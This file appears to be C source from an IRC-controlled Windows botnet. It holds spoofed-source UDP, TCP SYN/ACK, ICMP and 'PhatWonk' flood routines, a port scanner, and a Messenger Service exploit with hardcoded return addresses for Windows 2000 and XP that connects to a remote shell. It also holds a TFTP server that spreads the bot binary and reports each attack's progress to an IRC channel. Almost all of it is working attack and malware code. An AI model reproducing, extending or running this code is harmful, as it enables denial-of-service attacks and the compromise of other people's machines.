// function for sending udp packets
DWORD WINAPI udp(LPVOID param)
{
PINGFLOOD udp = *((PINGFLOOD *)param);
PINGFLOOD *udps = (PINGFLOOD *)param;
udps->gotinfo = TRUE;
char sendbuf[IRCLINE], pbuff[MAXPINGSIZE];
int i;
srand(GetTickCount());
SOCKET usock = fsocket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
IN_ADDR iaddr;
iaddr.s_addr = finet_addr(udp.host);
LPHOSTENT hostent = NULL;
if (iaddr.s_addr == INADDR_NONE)
hostent = fgethostbyname(udp.host);
if (hostent == NULL && iaddr.s_addr == INADDR_NONE) {
sprintf(sendbuf,"[UDP]: Error sending pings to %s.", udp.host);
if (!udp.silent) irc_privmsg(udp.sock, udp.chan, sendbuf, udp.notice);
addlog(sendbuf);
clearthread(udp.threadnum);
ExitThread(1);
}
ssin.sin_addr = ((hostent != NULL)?(*((LPIN_ADDR)*hostent->h_addr_list)):(iaddr));
ssin.sin_port = ((udp.port == 0)?(fhtons((unsigned short)((rand() % MAXPINGSIZE) + 1))):(fhtons((unsigned short)udp.port)));
if (udp.port < 1)
udp.port = 1;
if (udp.port > MAXUDPPORT)
udp.port = MAXUDPPORT;
udp.num = udp.num / 10;
if (udp.delay == 0)
udp.delay = 1;
for (i = 0; i < udp.size; i++)
pbuff[i] = (char)(rand() % 255);
while (udp.num-- > 0) {
//change port every 10 packets (if one isn't specified)
for (i = 0; i < 11; i++) {
fsendto(usock, pbuff, udp.size-(rand() % 10), 0, (LPSOCKADDR)&ssin, sizeof(ssin));
Sleep(udp.delay);
}
if (udp.port == 0)
ssin.sin_port = fhtons((unsigned short)((rand() % MAXPINGSIZE) + 1));
}
sprintf(sendbuf,"[UDP]: Finished sending packets to %s.", udp.host);
if (!udp.silent) irc_privmsg(udp.sock, udp.chan, sendbuf, udp.notice);
addlog(sendbuf);
clearthread(udp.threadnum);
ExitThread(0);
}
BOOL MessengerService(EXINFO exinfo)
{
int sockUDP,ver,packetsz;
unsigned char packet[8192];
struct sockaddr_in targetUDP;
struct
{
char os[30];
DWORD SEH;
DWORD JMP;
} targetOS[] =
{
{
"Windows 2000 SP 3 (en)",
0x77ee044c, // unhandledexceptionfilter pointer
0x768d693e // cryptsvc.dll call [esi+48] 0x768d693e
},
{
"Windows XP SP 1 (en)",
0x77ed73b4,
0x7804bf52 //rpcrt4.dll call [edi+6c]
}
};
int TargetOS = FpHost(exinfo.ip, FP_RPC);
if ((TargetOS == OS_WINNT) || (TargetOS == OS_UNKNOWN)) return FALSE;
if (TargetOS == OS_WIN2K) ver = 0;
if (TargetOS == OS_WINXP) ver = 1;
ZeroMemory(&targetUDP, sizeof(targetUDP));
targetUDP.sin_family = AF_INET;
targetUDP.sin_addr.s_addr = finet_addr(exinfo.ip);
targetUDP.sin_port = fhtons(exinfo.port);
packetsz = PreparePacket((char*)packet,sizeof(packet),targetOS[ver].JMP,targetOS[ver].SEH);
if ((sockUDP = fsocket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1)
{
return FALSE;
}
if (fsendto(sockUDP, (char*)packet, packetsz, 0, (struct sockaddr *)&targetUDP, sizeof(targetUDP)) == -1)
{
return FALSE;
}
fclosesocket(sockUDP);
Sleep(500);
if (ConnectShellEx(exinfo, 9191) == true) {
exploit[exinfo.exploit].stats++;
return TRUE;
}
return FALSE;
}
DWORD WINAPI TcpFloodThread(LPVOID param)
{
TCPFLOOD tcpflood = *((TCPFLOOD *)param);
TCPFLOOD *tcpfloods = (TCPFLOOD *)param;
tcpfloods->gotinfo = TRUE;
char sendbuf[IRCLINE], szSendBuf[60]={0};
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
srand(GetTickCount());
SOCKET ssock;
if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) {
sprintf(sendbuf,"[TCP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
BOOL flag = TRUE;
if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) {
sprintf(sendbuf,"[TCP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
if (finet_addr(tcpflood.ip) == INADDR_NONE) {
sprintf(sendbuf,"[TCP]: Invalid target IP.");
if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET;
ssin.sin_port=fhtons(0);
ssin.sin_addr.s_addr=finet_addr(tcpflood.ip);
int sent = 0;
unsigned long start = GetTickCount();
while (((GetTickCount() - start) / 1000) <= (unsigned long)tcpflood.time) {
ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.sourceIP=((tcpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(tcpflood.sock))));
ipHeader.destIP=ssin.sin_addr.s_addr;
((tcpflood.port == 0)?(tcpHeader.dport=fhtons((unsigned short)(rand()%1025))):(tcpHeader.dport=fhtons(tcpflood.port)));
tcpHeader.sport=fhtons((unsigned short)(rand()%1025));
tcpHeader.seq=fhtonl(0x12345678);
if (strstr(tcpflood.type,"syn")) {
tcpHeader.ack_seq=0;
tcpHeader.flags=SYN;
} else if (strstr(tcpflood.type,"ack")) {
tcpHeader.ack_seq=0;
tcpHeader.flags=ACK;
} else if (strstr(tcpflood.type,"random")) {
tcpHeader.ack_seq=rand()%3;
((rand()%2 == 0)?(tcpHeader.flags=SYN):(tcpHeader.flags=ACK));
}
tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.window=fhtons(512);
tcpHeader.urg_ptr=0;
tcpHeader.checksum=0;
psdHeader.saddr=ipHeader.sourceIP;
psdHeader.daddr=ipHeader.destIP;
psdHeader.zero=0;
psdHeader.proto=IPPROTO_TCP;
psdHeader.length=fhtons((unsigned short)(sizeof(tcpHeader)));
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
if (fsendto(ssock, (char *)&szSendBuf, sizeof(szSendBuf), 0, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
fclosesocket(ssock);
_snprintf(sendbuf,sizeof(sendbuf),"[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", tcpflood.ip, sent, fWSAGetLastError());
if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
sent++;
}
fclosesocket(ssock);
sprintf(sendbuf,"[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", tcpflood.type, tcpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / tcpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024));
if (!tcpflood.silent) irc_privmsg(tcpflood.sock, tcpflood.chan, sendbuf, tcpflood.notice);
addlog(sendbuf);
clearthread(tcpflood.threadnum);
ExitThread(0);
}
BOOL SynPortOpen(unsigned long src_ip, unsigned long dest_ip, unsigned int port, unsigned int delay)
{
char buffer[LOGLINE];
int size;
unsigned short src_port = 9801;
TCPHEADER2 send_tcp;
send_tcp.source = fhtons(src_port);
send_tcp.dest = fhtons((unsigned short)port);
send_tcp.seq = rand();
send_tcp.ack_seq = 0;
send_tcp.res1 = 0;
send_tcp.res2 = 0;
send_tcp.doff = 5;
send_tcp.fin = 0;
send_tcp.syn = 1;
send_tcp.rst = 0;
send_tcp.psh = 0;
send_tcp.ack = 0;
send_tcp.urg = 0;
send_tcp.window = fhtons(512);
send_tcp.check = 0;
send_tcp.urg_ptr = 0;
PSDHEADER psdheader;
psdheader.saddr = src_ip;
psdheader.daddr = dest_ip;
psdheader.zero = 0;
psdheader.proto = IPPROTO_TCP;
psdheader.length = fhtons(sizeof(send_tcp));
memcpy (&psdheader.tcp, &send_tcp, sizeof (send_tcp));
send_tcp.check = checksum((unsigned short *)&psdheader, sizeof (psdheader));
SOCKADDR_IN ssin;
memset(&ssin,0,sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)port);
ssin.sin_addr.s_addr = dest_ip;
int ssin_len = sizeof(ssin);
SOCKET tcp_sock = fsocket(AF_INET, SOCK_RAW, IPPROTO_TCP);
if (tcp_sock == INVALID_SOCKET) {
addlog("socket open failed");
return FALSE;
}
if ((size = fsendto(tcp_sock,(const char *)&send_tcp,sizeof(send_tcp),0,(LPSOCKADDR)&ssin,ssin_len)) != 20) {
sprintf(buffer,"sendto() socket failed. sent = %d <%d>.", size, fWSAGetLastError());
addlog(buffer);
fclosesocket(tcp_sock);
return FALSE;
}
RECVHEADER recv_tcp;
memset (&recv_tcp,'\0',sizeof(recv_tcp));
while (recv_tcp.tcp.dest != src_port) {
if (frecvfrom(tcp_sock,(char *)&recv_tcp,sizeof(recv_tcp),0,(LPSOCKADDR)&ssin, &ssin_len) < 0) {
addlog("recvfrom() socket failed");
fclosesocket(tcp_sock);
return FALSE;
}
}
fclosesocket(tcp_sock);
if (recv_tcp.tcp.syn == 1) {
addlog("Socket open.");
return TRUE;
} else {
addlog("Socket closed.");
return FALSE;
}
}
DWORD WINAPI ICMPFloodThread(LPVOID param)
{
ICMPFLOOD icmpflood = *((ICMPFLOOD *)param);
ICMPFLOOD *icmpfloods = (ICMPFLOOD *)param;
icmpfloods->gotinfo = TRUE;
char sendbuf[IRCLINE], szSendBuf[60]={0};
static ECHOREQUEST echo_req;
SOCKET ssock;
if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) {
sprintf(sendbuf,"[ICMP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice);
clearthread(icmpflood.threadnum);
ExitThread(0);
}
BOOL flag = TRUE;
if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) {
sprintf(sendbuf,"[ICMP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError());
if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice);
clearthread(icmpflood.threadnum);
ExitThread(0);
}
if (finet_addr(icmpflood.ip) == INADDR_NONE) {
sprintf(sendbuf,"[ICMP]: Invalid target IP.");
if (!icmpflood.silent) irc_privmsg(icmpflood.sock,icmpflood.chan,sendbuf,icmpflood.notice);
clearthread(icmpflood.threadnum);
ExitThread(0);
}
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET;
ssin.sin_port=fhtons(0);
ssin.sin_addr.s_addr=finet_addr(icmpflood.ip);
int sent = 0;
unsigned long start = GetTickCount();
while (((GetTickCount() - start) / 1000) <= (unsigned long)icmpflood.time) {
echo_req.ipHeader.verlen=(4<<4 | sizeof(IPHEADER)/sizeof(unsigned long));
echo_req.ipHeader.total_len=fhtons(sizeof(ECHOREQUEST));
echo_req.ipHeader.ident=1;
echo_req.ipHeader.frag_and_flags=0;
echo_req.ipHeader.ttl=128;
echo_req.ipHeader.proto=IPPROTO_ICMP;
echo_req.ipHeader.checksum=0;
echo_req.ipHeader.sourceIP=((icmpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(icmpflood.sock))));
echo_req.ipHeader.destIP=ssin.sin_addr.s_addr;
echo_req.icmpHeader.type = rand()%256;
echo_req.icmpHeader.subcode = rand()%256;
echo_req.icmpHeader.id = (rand() % 240) + 1;
echo_req.icmpHeader.checksum = 0;
echo_req.icmpHeader.seq = 1;
//fill the packet data with a random character..
memset(echo_req.cData, rand()%255, sizeof(echo_req.cData));
if (fsendto(ssock, (const char *) &echo_req, sizeof(ECHOREQUEST), 0, (LPSOCKADDR)&ssin, sizeof(SOCKADDR_IN)) == SOCKET_ERROR) {
fclosesocket(ssock);
_snprintf(sendbuf,sizeof(sendbuf),"[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.", icmpflood.ip, sent, fWSAGetLastError());
if (!icmpflood.silent) irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice);
clearthread(icmpflood.threadnum);
ExitThread(0);
}
sent++;
}
fclosesocket(ssock);
sprintf(sendbuf,"[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).", icmpflood.type, icmpflood.ip, sent, (((sent * sizeof(szSendBuf)) / 1024) / icmpflood.time), (((sent * sizeof(szSendBuf)) / 1024) / 1024));
if (!icmpflood.silent) irc_privmsg(icmpflood.sock, icmpflood.chan, sendbuf, icmpflood.notice);
clearthread(icmpflood.threadnum);
ExitThread(0);
}
DWORD WINAPI tftpserver(LPVOID param)
{
FILE *fp;
char sendbuf[IRCLINE], buffer[128], type[]="octet", IP[18];
int err=1;
TFTP tftp = *((TFTP *)param);
TFTP *tftps = (TFTP *)param;
tftps->gotinfo = TRUE;
tftp.threads++;
SOCKET ssock;
if ((ssock=fsocket(AF_INET,SOCK_DGRAM,0)) == INVALID_SOCKET) {
Sleep(400);
sprintf(sendbuf,"[TFTP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
addlog(sendbuf);
clearthread(tftp.threadnum);
ExitThread(0);
}
threads[tftp.threadnum].sock=ssock;
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_port = fhtons((unsigned short)tftp.port);
ssin.sin_addr.s_addr = INADDR_ANY;
if((fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) {
Sleep(5000);
tftp.threads--;
return tftpserver(param);
}
if ((fp=fopen(tftp.filename, "rb")) == NULL) {
Sleep(400);
sprintf(sendbuf,"[TFTP]: Failed to open file: %s.",tftp.filename);
irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
addlog(sendbuf);
clearthread(tftp.threadnum);
ExitThread(0);
}
while(err>0 && tftps->gotinfo && fp) {
TIMEVAL timeout;
timeout.tv_sec=5;
timeout.tv_usec=5000;
fd_set fd;
FD_ZERO(&fd);
FD_SET(ssock,&fd);
memset(buffer,0,sizeof(buffer));
if(fselect(0,&fd,NULL,NULL,&timeout) > 0) {
SOCKADDR_IN csin;
int csin_len=sizeof(csin);
char f_buffer[BLOCKSIZE+4]="";
err=frecvfrom(ssock, buffer, sizeof(buffer), 0, (LPSOCKADDR)&csin, &csin_len);
sprintf(IP,finet_ntoa(csin.sin_addr));
// parse buffer
if(buffer[0]==0 && buffer[1]==1) { //RRQ
char *tmprequest=buffer,*tmptype=buffer;
tmprequest+=2; //skip the opcode
tmptype+=(strlen(tftp.requestname)+3); //skip the opcode and request name + NULL
if(strncmp(tftp.requestname,tmprequest,strlen(tftp.requestname)) != 0||strncmp(type,tmptype,strlen(type)) != 0) {
fsendto(ssock, "\x00\x05\x00\x01\x46\x69\x6C\x65\x20\x4E\x6F\x74\x20\x46\x6F\x75\x6E\x64\x00", 19, 0, (LPSOCKADDR)&csin,csin_len);
// for loop to add a \0 to the end of the requestname
sprintf(buffer,"[TFTP]: File not found: %s (%s).",IP,tftp.requestname);
addlog(buffer);
} else { // good rrq packet send first data packet
fseek(fp, 0, SEEK_SET);
f_buffer[0]=0; f_buffer[1]=3; // DATA
f_buffer[2]=0; f_buffer[3]=1; // DATA BLOCK #
err=fread(&f_buffer[4], 1, BLOCKSIZE, fp);
fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len);
sprintf(sendbuf,"[TFTP]: File transfer started to IP: %s (%s).",IP,tftp.filename);
if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
addlog(sendbuf);
}
} else if(buffer[0]==0 && buffer[1]==4) { // ACK
// send next packet
unsigned int blocks;
BYTE b1=buffer[2],b2=buffer[3]; // ACK BLOCK #
f_buffer[0]=0; f_buffer[1]=3; // DATA
if (b2==255) { // DATA BLOCK #
f_buffer[2]=++b1;
f_buffer[3]=b2=0;
} else {
f_buffer[2]=b1;
f_buffer[3]=++b2;
}
blocks=(b1 * 256) + b2 - 1;
// remember to subtract 1 as the ACK block # is 1 more than the actual file block #
fseek(fp, blocks * BLOCKSIZE, SEEK_SET);
err=fread(&f_buffer[4], 1, BLOCKSIZE, fp);
fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len);
if (err==0) {
sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s (%s).",IP,tftp.filename);
if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
addlog(sendbuf);
}
} else { // we dont support any other commands
fsendto(ssock, "\x00\x05\x00\x04\x6B\x74\x68\x78\x00",9, 0, (LPSOCKADDR)&csin, csin_len);
}
} else
continue;
}
// check for ack, then msg irc on transfer complete
fclosesocket(ssock);
fclose(fp);
tftp.threads--;
if(tftps->gotinfo == FALSE) {
clearthread(tftp.threadnum);
ExitThread(0);
}
Sleep(1000);
return tftpserver(param);
}
long SendDDOS(unsigned long TargetIP, unsigned int SpoofingIP, char *Type, unsigned short TargetPort, int len)
{
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
LARGE_INTEGER freq, halt_time, cur;
char szSendBuf[60]={0},buf[64];
int rect;
if (fWSAStartup(MAKEWORD(2,2), &WSAData)!=0)
return FALSE;
if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED )) == INVALID_SOCKET) {
fWSACleanup();
return FALSE;
}
BOOL flag=TRUE;
if (fsetsockopt(sock,IPPROTO_IP, IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
fclosesocket(sock);
fWSACleanup();
return FALSE;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=fhtons((unsigned short)TargetPort);
addr_in.sin_addr.s_addr=TargetIP;
ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=TargetIP;
tcpHeader.dport=fhtons((unsigned short)TargetPort);
tcpHeader.sport=fhtons((unsigned short)rand()%1025);
tcpHeader.seq=fhtonl(0x12345678);
/* A SYN attack simply smash its target up with TCP SYN packets.
Each SYN packet needs a SYN-ACK response and forces the server to wait for
the good ACK in reply. Of course, we just never gives the ACK, since we use a
bad IP address (spoof) there's no chance of an ACK returning.
This quickly kills a server as it tries to send out SYN-ACKs while waiting for ACKs.
When the SYN-ACK queues fill up, the server can no longer take any incoming SYNs,
and that's the end of that server until the attack is cleared up.*/
if (strcmp(Type,"ddos.syn") == 0) {
tcpHeader.ack_seq=0;
tcpHeader.flags=SYN;
} else if (strcmp(Type,"ddos.ack") == 0) {
tcpHeader.ack_seq=0;
tcpHeader.flags=ACK;
} else if (strcmp(Type,"ddos.random") == 0) {
tcpHeader.ack_seq=rand()%3;
if (rand()%2 == 0)
tcpHeader.flags=SYN;
else
tcpHeader.flags=ACK;
}
tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.window=fhtons(16384);
tcpHeader.urg_ptr=0;
long total = 0;
QueryPerformanceFrequency(&freq);
QueryPerformanceCounter(&cur);
halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart;
while(TRUE) {
tcpHeader.checksum=0;
tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000));
tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand()));
ipHeader.sourceIP=fhtonl(SpoofingIP++);
psdHeader.daddr=ipHeader.destIP;
psdHeader.zero=0;
psdHeader.proto=IPPROTO_TCP;
psdHeader.length=fhtons(sizeof(tcpHeader));
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&addr_in, sizeof(addr_in));
if (rect==SOCKET_ERROR) {
sprintf(buf, "[DDoS]: Send error: <%d>.",fWSAGetLastError());
addlog(buf);
fclosesocket(sock);
fWSACleanup();
return 0;
}
total += rect;
QueryPerformanceCounter(&cur);
if (cur.QuadPart >= halt_time.QuadPart)
break;
}
fclosesocket(sock);
fWSACleanup();
return (total);
}
long SendSyn(unsigned long TargetIP, unsigned int SpoofingIP, unsigned short TargetPort, int len)
{
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader;
LARGE_INTEGER freq, halt_time, cur;
char szSendBuf[60]={0},buf[64];
int rect;
WSADATA WSAData;
if (fWSAStartup(MAKEWORD(2,2), &WSAData) != 0)
return FALSE;
SOCKET sock;
if ((sock = fWSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED)) == INVALID_SOCKET) {
fWSACleanup();
return FALSE;
}
BOOL flag=TRUE;
if (fsetsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(flag)) == SOCKET_ERROR) {
fclosesocket(sock);
fWSACleanup();
return FALSE;
}
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family=AF_INET;
ssin.sin_port=fhtons(TargetPort);
ssin.sin_addr.s_addr=TargetIP;
ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader));
ipHeader.ident=1;
ipHeader.frag_and_flags=0;
ipHeader.ttl=128;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=TargetIP;
tcpHeader.dport=fhtons(TargetPort);
tcpHeader.ack_seq=0;
tcpHeader.lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.flags=2;
tcpHeader.window=fhtons(16384);
tcpHeader.urg_ptr=0;
long total = 0;
QueryPerformanceFrequency(&freq);
QueryPerformanceCounter(&cur);
halt_time.QuadPart = (freq.QuadPart * len) + cur.QuadPart;
while (1) {
tcpHeader.checksum=0;
tcpHeader.sport=fhtons((unsigned short)((rand() % 1001) + 1000));
tcpHeader.seq=fhtons((unsigned short)((rand() << 16) | rand()));
ipHeader.sourceIP=fhtonl(SpoofingIP++);
psdHeader.daddr=ipHeader.destIP;
psdHeader.zero=0;
psdHeader.proto=IPPROTO_TCP;
psdHeader.length=fhtons(sizeof(tcpHeader));
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf+sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
tcpHeader.checksum=checksum((USHORT *)szSendBuf,sizeof(psdHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf+sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
memset(szSendBuf+sizeof(ipHeader)+sizeof(tcpHeader), 0, 4);
ipHeader.checksum=checksum((USHORT *)szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader));
memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
rect=fsendto(sock, szSendBuf, sizeof(ipHeader)+sizeof(tcpHeader),0,(LPSOCKADDR)&ssin, sizeof(ssin));
if (rect==SOCKET_ERROR) {
sprintf(buf, "[SYN]: Send error: <%d>.",fWSAGetLastError());
addlog(buf);
fclosesocket(sock);
fWSACleanup();
return 0;
}
total += rect;
QueryPerformanceCounter(&cur);
if (cur.QuadPart >= halt_time.QuadPart)
break;
}
fclosesocket(sock);
fWSACleanup();
return (total);
}
char* SendPhatWonk(unsigned long TargetIP, unsigned int len, int delay)
{
BOOL flag=TRUE;
unsigned long lTimerCount=0;
struct timespec ts;
int i=0;
struct sockaddr_in addr;
int scansock=0;
sock=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED);
fsetsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char*)&flag, sizeof(flag));
srand(GetTickCount());
unsigned int port[28] = { 1025,21,22,23,25,53,80,81,88,110,113,119,135,
137,139,143,443,445,1024,1433,1500,
1720,3306,3389,5000,6667,8000,8080 };
unsigned int openport[28] = {0,0,0};
static char hitports[1024] = "";
int hitport=0, lastport=0;
char tmpMess[]="";
struct timeval working_timeout;
working_timeout.tv_sec = 3;
working_timeout.tv_usec = 3000;
for (i=0;i<28;i++)
{
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = TargetIP;
addr.sin_port = fhtons(port[i]);
scansock = fsocket(AF_INET,SOCK_STREAM,0);
int result = connect_no_timeout(scansock,(struct sockaddr *)&addr,sizeof(struct sockaddr),&working_timeout);
fclosesocket(scansock);
if(result == 0)
{
openport[i] = port[i];
}
}
sprintf(hitports, " ");
lTimerCount=GetTickCount();
for (i=0;i<28;i++)
{
if ((GetTickCount()-lTimerCount)/1000>len) break;
if (openport[i] != 0)
{
hitport = openport[i];
//hitports.Format("%s%d ",hitports.CStr(),hitport);
sprintf(hitports, "%s%d ", hitports, hitport);
}
else
{
hitport = fhtons (brandom (0, 65535)); // no open ports
}
}
for (;;)
{
memset(&packet, 0, sizeof(packet));
ts.tv_sec = 0;
ts.tv_nsec = 10;
packet.ip.ihl = 5;
packet.ip.ver = 4;
packet.ip.pro = IPPROTO_TCP;
packet.ip.tos = 0x08;
packet.ip.id = fhtons (brandom (1024, 65535));
packet.ip.tl = fhtons(sizeof(packet));
packet.ip.off = 0;
packet.ip.ttl = 255;
if (!spoofing)
packet.ip.src = spoofip(TargetIP);
else
packet.ip.src = finet_addr(spoof);
packet.ip.dst = TargetIP;
packet.tcp.flg = 0;
packet.tcp.win = fhtons(16384);
packet.tcp.seq = fhtonl (brandom (0, 65535) + (brandom (0, 65535) << 8));
packet.tcp.ack = 0;
packet.tcp.off = 5;
packet.tcp.urp = 0;
packet.tcp.dst = hitport;
cksum.pseudo.daddr = TargetIP;
cksum.pseudo.mbz = 0;
cksum.pseudo.ptcl = IPPROTO_TCP;
cksum.pseudo.tcpl = fhtons(sizeof(struct xtcphdr));
s_in.sin_family = AF_INET;
s_in.sin_addr.s_addr = TargetIP;
s_in.sin_port = packet.tcp.dst;
for(i=0;i<1023;++i) {
/*
send 1 syn packet + 1023 ACK packets.
*/
if(i==0) {
packet.tcp.src = fhtons (brandom (0, 65535));
cksum.pseudo.saddr = packet.ip.src;
packet.tcp.flg = SYN;
packet.tcp.ack = 0;
}
else {
packet.tcp.flg = ACK;
packet.tcp.ack = fhtons (brandom (0, 65535));
}
++packet.ip.id;
++packet.tcp.seq;
s_in.sin_port = packet.tcp.dst;
packet.ip.sum = 0;
packet.tcp.sum = 0;
cksum.tcp = packet.tcp;
packet.ip.sum = checksum((unsigned short *)&packet.ip, 20);
packet.tcp.sum = checksum((unsigned short *)&cksum, sizeof(cksum));
fsendto(sock, (const char *)&packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in));
}
if((GetTickCount()-lTimerCount)/1000>len) break;
Sleep(delay);
}
return hitports;
}